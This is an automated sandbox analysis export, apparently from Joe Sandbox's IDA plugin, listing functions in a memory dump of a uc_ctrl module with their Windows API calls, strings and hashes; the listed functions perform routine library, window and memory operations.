Opcode ID: 5d779433c9180b849e4942670a456aaf3fda1c6bf0d17e54cabd4de3208021b3
Instruction ID: a21953f163e8967704a4d366d375f72cae98d33f52528913fb18bc7fd504b0a6
Opcode Fuzzy Hash: 5d779433c9180b849e4942670a456aaf3fda1c6bf0d17e54cabd4de3208021b3
Instruction Fuzzy Hash: F7212DB1D1124D9EEF01DFA0C894EEEBB7CEF14208F50482AD510F2684EB749A49CB64

Function 6CB34FEE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

Edit, xrefs: 6CB35045

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 246416ae343640ce67f14ea159aafa76e8a66537da510b99ad865feba01318de
Instruction ID: ff84697b3100508a30b74d24bf6be85a63c16bb17b98850d6f71cccc292055ae
Opcode Fuzzy Hash: 246416ae343640ce67f14ea159aafa76e8a66537da510b99ad865feba01318de
Instruction Fuzzy Hash: 7011AC30301295AAEF211A35CC08FEA76BCEF02399F145535E55F92DA0DB7BD408C6D5

Function 6CB2E33D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50libraryfileloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6CB2E350
GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 6CB2E360
CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 6CB2E3A8

Strings

kernel32.dll, xrefs: 6CB2E34B
CreateFileTransactedW, xrefs: 6CB2E35A

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: AddressCreateFileHandleModuleProc
String ID: CreateFileTransactedW$kernel32.dll
API String ID: 2580138172-2053874626
Opcode ID: 97ae059277338214ef8de9c9c4ad3f84ff8185ac3c828f0c07bf2a59383abfad
Instruction ID: f73b5af8c1853cfe210cb99f9e578ecf42edde12200d60ded077bce30033596f
Opcode Fuzzy Hash: 97ae059277338214ef8de9c9c4ad3f84ff8185ac3c828f0c07bf2a59383abfad
Instruction Fuzzy Hash: A4014C3210118AFF9F020EA5CC44DAF3F7AFB493567104529FA6942560D736D871AB91

Function 6CB33E9C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB33EA3
GetClassNameW.USER32(?,00000000,00000400), ref: 6CB33EDA
GetWindowLongW.USER32(?,000000F0), ref: 6CB33F10

Strings

ComboBox, xrefs: 6CB33EEA
ComboBoxEx32, xrefs: 6CB33EFB

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ClassH_prolog3LongNameWindow
String ID: ComboBox$ComboBoxEx32
API String ID: 297531199-1907415764
Opcode ID: 498c805a2cdf71eb541f7bab617393bb0a84f2f9a83b37d745dcaf444be39ef8
Instruction ID: a22d5ed7df735791022fe781cf1a36140f56853174d6e13a8726f3d2683f9b38
Opcode Fuzzy Hash: 498c805a2cdf71eb541f7bab617393bb0a84f2f9a83b37d745dcaf444be39ef8
Instruction Fuzzy Hash: 82018BB5915166ABCF10DB64CD98AEFB774BF10368F901928E425A2ED0EB34A909CB50

Function 6CB231C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 6CB231F0
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6CB23200

Part of subcall function 6CB1D8BC: GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,00000010,?,?,6CB1D7AF,?,00000010), ref: 6CB1D8CF
Part of subcall function 6CB1D8BC: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6CB1D8DF

Strings

Advapi32.dll, xrefs: 6CB231EB
RegDeleteKeyExW, xrefs: 6CB231FA

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyExW
API String ID: 1646373207-2191092095
Opcode ID: 14b83981965c467c1c54dd0ab9d0113f5a7cab57dd867d65ba3b0dcc273f5324
Instruction ID: 327b61bfb4b1c2199fb8b9b3461368d3ec0f3cc0df1cc160a321efacc22746ba
Opcode Fuzzy Hash: 14b83981965c467c1c54dd0ab9d0113f5a7cab57dd867d65ba3b0dcc273f5324
Instruction Fuzzy Hash: 3E01F735246181FBEF014F55CC04B9ABF3DFB0B715B148025FA1863A10CB769421DB91

Function 6CC62758 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6CC62709,?,?,6CC626A9,?,6CD216A0,0000000C,6CC627DC,00000000,00000000), ref: 6CC62778
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CC6278B
FreeLibrary.KERNEL32(00000000,?,?,?,6CC62709,?,?,6CC626A9,?,6CD216A0,0000000C,6CC627DC,00000000,00000000,00000001,6CC519F9), ref: 6CC627AE

Strings

CorExitProcess, xrefs: 6CC62783
mscoree.dll, xrefs: 6CC62771

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 35d4d3c312c92769238a7e3ab50f15fa5d2cf6a4928eff030bc10f4faa6d3047
Instruction ID: 3f5b2a61e42a95d08b180fd02deecb098826c98aa979f05d2cf257012757cb94
Opcode Fuzzy Hash: 35d4d3c312c92769238a7e3ab50f15fa5d2cf6a4928eff030bc10f4faa6d3047
Instruction Fuzzy Hash: DFF03C31A12108ABDB059F95CD59BEEBFB8EB0A629F5000A9A805A2640EB319950CA90

Function 6CB21847 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6CB21880

Part of subcall function 6CB20D03: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6CB20D29
Part of subcall function 6CB20D03: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6CB20D39
Part of subcall function 6CB20D03: EncodePointer.KERNEL32(00000000), ref: 6CB20D42
Part of subcall function 6CB20D03: LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 6CB20D64

GetProcAddress.KERNEL32(00000000,DwmSetIconicLivePreviewBitmap), ref: 6CB21869
EncodePointer.KERNEL32(00000000), ref: 6CB21872

Strings

DwmSetIconicLivePreviewBitmap, xrefs: 6CB21863
dwmapi.dll, xrefs: 6CB21854

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleLibraryLoadModule
String ID: DwmSetIconicLivePreviewBitmap$dwmapi.dll
API String ID: 2269242174-1757063745
Opcode ID: b67a769a7fe84234c764e7c7d13cdb0f73166737e5ef1f6cfba6e10574c8da4b
Instruction ID: 3f9ac33a12cc28c9755bbbbbf31f84c39f4c02ad750524d6235a1aa89a8a9194
Opcode Fuzzy Hash: b67a769a7fe84234c764e7c7d13cdb0f73166737e5ef1f6cfba6e10574c8da4b
Instruction Fuzzy Hash: BDF09036A47255BBDF011AA8DC488EB3FB9EB062563080524BD1C9BA10EB39C8114AA1

Function 6CB2190C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6CB21945

Part of subcall function 6CB20D03: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6CB20D29
Part of subcall function 6CB20D03: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6CB20D39
Part of subcall function 6CB20D03: EncodePointer.KERNEL32(00000000), ref: 6CB20D42
Part of subcall function 6CB20D03: LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 6CB20D64

GetProcAddress.KERNEL32(00000000,DwmSetWindowAttribute), ref: 6CB2192E
EncodePointer.KERNEL32(00000000), ref: 6CB21937

Strings

DwmSetWindowAttribute, xrefs: 6CB21928
dwmapi.dll, xrefs: 6CB21919

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleLibraryLoadModule
String ID: DwmSetWindowAttribute$dwmapi.dll
API String ID: 2269242174-3105884578
Opcode ID: 253ea20df9dba49da3b0ddad8e6ba77c5934c383e27817c556e71f7b17ae2c1b
Instruction ID: 7ba1ed8b7517813bea8d1dbd2f59f5470c6aee248b7d828114d7be20b4c98f04
Opcode Fuzzy Hash: 253ea20df9dba49da3b0ddad8e6ba77c5934c383e27817c556e71f7b17ae2c1b
Instruction Fuzzy Hash: C9F05435646395BB9F021F688C0886F3EB99B0A7697084414BD1DE7A10EB3ACC129AB1

Function 6CB218AB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(00000000), ref: 6CB218E4

Part of subcall function 6CB20D03: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6CB20D29
Part of subcall function 6CB20D03: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6CB20D39
Part of subcall function 6CB20D03: EncodePointer.KERNEL32(00000000), ref: 6CB20D42
Part of subcall function 6CB20D03: LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 6CB20D64

GetProcAddress.KERNEL32(00000000,DwmSetIconicThumbnail), ref: 6CB218CD
EncodePointer.KERNEL32(00000000), ref: 6CB218D6

Strings

DwmSetIconicThumbnail, xrefs: 6CB218C7
dwmapi.dll, xrefs: 6CB218B8

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleLibraryLoadModule
String ID: DwmSetIconicThumbnail$dwmapi.dll
API String ID: 2269242174-2331651847
Opcode ID: 45aca5f1149f71c0cd83d1269cb21e3851ce365d5ac253628388686f3b89a2d1
Instruction ID: 806b08ac70e92f5b60d72962042af819f1c6afb110e565ad4e7877512164480c
Opcode Fuzzy Hash: 45aca5f1149f71c0cd83d1269cb21e3851ce365d5ac253628388686f3b89a2d1
Instruction Fuzzy Hash: DCF08935606359B79F011BA4DC088AB3EBDDB077693184411FD1D97A00EB39DC5296A1

Function 6CC44C16 Relevance: 7.7, APIs: 5, Instructions: 221windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 6CC44D77
SendMessageW.USER32(?,00000187,?,00000000), ref: 6CC44DD1
GetParent.USER32(?), ref: 6CC44DE6
SendMessageW.USER32(?,00000111,?,?), ref: 6CC44E14
SendMessageW.USER32(?,00000185,00000001,?), ref: 6CC44E29

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$Parent
String ID:
API String ID: 1020955656-0
Opcode ID: 15e879af966bfe1247e943f7e886db2ecd42de47d55254cc26576a0770f87974
Instruction ID: e0553c921eb49ff0af43159ac90bc4bb90b09bf030670bd92bec9019d75f497b
Opcode Fuzzy Hash: 15e879af966bfe1247e943f7e886db2ecd42de47d55254cc26576a0770f87974
Instruction Fuzzy Hash: 1C61A371B00214ABDB15CF69CC84A5ABBA9FF85354B28C169F909DFB44EB70DD11CBA0

Function 6CB49B25 Relevance: 7.7, APIs: 5, Instructions: 175windowmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB49B2C
GlobalAlloc.KERNEL32(00000040,0000000C), ref: 6CB49BB5
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 6CB49BF2
SendMessageW.USER32(?,0000104D,00000000,0000000F), ref: 6CB49C83
SendMessageW.USER32(?,00001200,00000000,00000000), ref: 6CB49C9D

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$AllocGlobalH_prolog3
String ID:
API String ID: 3246992648-0
Opcode ID: b4f575579463692503830574bbcc4df24cd5ee3d43fc264786f5810635faed9c
Instruction ID: e11b6056b7cd6bd724f3de0a7954e032e338245b62f8a06ce337ee8acecd126b
Opcode Fuzzy Hash: b4f575579463692503830574bbcc4df24cd5ee3d43fc264786f5810635faed9c
Instruction Fuzzy Hash: A9613870E002199FDB14CFA4C885AEEBBB9FF48314F104119E51AAB790DB74A915CFA4

Function 6CC1247C Relevance: 7.7, APIs: 5, Instructions: 155stringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CC12486
GlobalLock.KERNEL32(?,000001F4,6CC12445,00000000,?,?,6CB97052,?,00000000,0014000C,00000000,?,00000000), ref: 6CC124A7

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

lstrcmpW.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000,?,?,6CB97052,?,00000000,0014000C,00000000), ref: 6CC12549
lstrcmpW.KERNEL32(?,00000000,6CB97052,?,?,6CB97052,?,00000000,0014000C,00000000), ref: 6CC12579
lstrcmpW.KERNEL32(?,00000000,?,?,?,6CB97052,?,00000000,0014000C,00000000), ref: 6CC1259F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: lstrcmp$Exception@8GlobalH_prolog3LockThrow
String ID:
API String ID: 1434931896-0
Opcode ID: 117458b4bd09b923a632f03d12e44a0a16160ae429a457cadbabe5e1247f0eaf
Instruction ID: e95cdf5fe72eed01b485147e4759d0e13fa4ed492edf86b725a65aad22481120
Opcode Fuzzy Hash: 117458b4bd09b923a632f03d12e44a0a16160ae429a457cadbabe5e1247f0eaf
Instruction Fuzzy Hash: ED61AF74905709DFEB12CF66C8A9BEEB7B4BF05309F004459D56696EA0EB34DA84EF00

Function 6CB34755 Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6CB3475C
GlobalLock.KERNEL32(00000000,?,?), ref: 6CB3485F
DestroyWindow.USER32(?,?,?,?,6CB34537,00000000), ref: 6CB3492D
GlobalUnlock.KERNEL32(00000000,?,?,?,6CB34537,00000000), ref: 6CB3493A
GlobalFree.KERNEL32(00000000), ref: 6CB34941

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Global$DestroyFreeH_prolog3_catchLockUnlockWindow
String ID:
API String ID: 571947920-0
Opcode ID: 6db8dad0367596fd2ede9bc07d6b8d1140dd27f4082b2c25fdf3040331835497
Instruction ID: ee773694b9c8087dde9b8bfb7f3702dbb3f7eb7f86aa1a706496488bcdffd3bd
Opcode Fuzzy Hash: 6db8dad0367596fd2ede9bc07d6b8d1140dd27f4082b2c25fdf3040331835497
Instruction Fuzzy Hash: 5251C330E012AADFCF05DFA4C844AEEBBB5AF09318F141119E915B7B90DB399A05CF95

Function 6CB86D4D Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

GetClientRect.USER32(00000000,6CB50CBC), ref: 6CB86D7C

Part of subcall function 6CB25BCB: ClientToScreen.USER32(?,?), ref: 6CB25BDA
Part of subcall function 6CB25BCB: ClientToScreen.USER32(?,?), ref: 6CB25BE7

PtInRect.USER32(6CB50CBC,?,?), ref: 6CB86D96
PtInRect.USER32(?,?,?), ref: 6CB86E0F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
